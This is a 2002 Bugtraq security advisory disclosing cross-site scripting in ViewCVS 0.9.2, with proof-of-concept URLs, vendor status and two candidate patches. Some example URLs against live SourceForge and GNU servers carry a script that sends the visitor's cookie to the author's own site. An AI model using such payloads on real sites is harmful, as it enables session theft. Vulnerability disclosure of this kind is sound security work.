![[LWN Logo]](/images/lcorner.png) |
|
![[LWN.net]](/images/Included.png) |
From: office <office@office.ac>
To: bugtraq@securityfocus.com
Subject: cross-site scripting bug of ViewCVS
Date: Sun, 19 May 2002 09:32:24 +0900
Cc: office@ukky.net
ViewCVS: cross-site scripting bug
I found the following cross-site scripting vulnerability in ViewCVS:
Details
------------
Product: ViewCVS
Affected Version: 0.9.2 and under it
Vendor's URL: http://viewcvs.sourceforge.net/
Vendor Status: Informed. And they already fixed it only in their team.
But nothing has been published.
Introduction
------------
ViewCVS is a WWW interface for CVS Repositories. It is widely used in
freesoft community and open source community. Unfortunately, it has
the vulnerability of cross-site scripting.
Proof
-----------------
If you access to the URL like;
http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("hello")</script>
http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>
The former URL is valid for Internet Explorer 6.0, Opera 6.01, but not
valid for Netscape 4.78, Netscape 6.2.2, mozilla 0.9.9 on windows XP.
And these URL can do is only showing a popup window appearing.
Example
-----------------
For example, you can see the vulnerability at the SourceForge.net
(Vendor's site is on SourceForge.net).
If you access to the sample URL following, your cookie (including
your login information and session information about SourceForge.net)
is stolen by my site (http://www.office.ac)
The stolen cookie's information of Internet Explorer 6.0 includes your
login information and session information about SourceForge.net.
But the stolen cookie's information of Opera 6.01 and mozilla 0.9.9
includes only user name, and the cookie information of Netscape 4.78
and 6.2.2 is nothing. (I don't know why.)
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>
The ViewCVS at SourceForge.net is not newest version.
And you can see the vulnerability of newest version of ViewCVS at GNU.
http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=<script>alert("hello")</script>
http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev"><script>alert("hello")</script>
Vendor status
--------------
Vendors are noticed at 13 Mar 2002, and 26 Mar 2002.
And I heard following:
Some Japanese hackers (contributors belong to SourceForge.jp and
Hyper NIKKI System Project) proposed a patch program to ViewCVS team
in April. But ViewCVS team rejected it. ViewCVS team said they
fixed it at April 1st.
But nothing has been published by ViewCVS team after it.
Patch
--------------
Two patches are here. I got these patches with the non-safe method,
so I am not sure that their code are completely same to original.
And I cannot understand about code nor programming at all.
So I don't have any accountability about these patch.
One was made by Kenji Suzuki <kenji@po.ganseki.ne.jp> / Hyper
NIKKI System Project (http://www.h14m.org/).
I heard it has been applied to the web page of Hyper
NIKKI System Project, and Sourceforge.jp.
--- viewcvs.py.orig Fri Dec 14 23:14:39 2001
+++ viewcvs.py Sun Mar 31 15:24:34 2002
@@ -172,7 +172,7 @@
# parse the query params into a dictionary (and use defaults)
query_dict = default_settings.copy()
for name, values in cgi.parse().items():
- query_dict[name] = values[0]
+ query_dict[name] = cgi.escape(values[0])
# set up query strings, prefixed by question marks and ampersands
query = sticky_query(query_dict)
I heart another patch is made by ViewCVS team. I got this code
from Taku YASUI <tach@sourceforge.jp> / Sourceforge.jp
(http://sourceforge.jp/) who had been proposed former patch to
ViewCVS team.
===================================================================
RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v
retrieving revision 1.107
retrieving revision 1.108
diff -u -r1.107 -r1.108
--- viewcvs/viewcvs/lib/viewcvs.py 2002/02/22 09:20:46 1.107
+++ viewcvs/viewcvs/lib/viewcvs.py 2002/04/01 01:32:16 1.108
@@ -180,8 +180,14 @@
# parse the query params into a dictionary (and use defaults)
query_dict = default_settings.copy()
+
+ # RE that ViewCVS doesn't use in any URL, but a CSS attack might
+ re_url_validate = re.compile('\'|"|<|>')
for name, values in cgi.parse().items():
- query_dict[name] = values[0]
+ # do not accept values that contain non-ViewCVS characters
+ # except for search
+ if not re.search(re_url_validate, values[0]) or name == 'search':
+ query_dict[name] = values[0]
# set up query strings, prefixed by question marks and ampersands
query = sticky_query(query_dict)
--
office
office@ukky.net
office@office.ac
http://www.office.ac/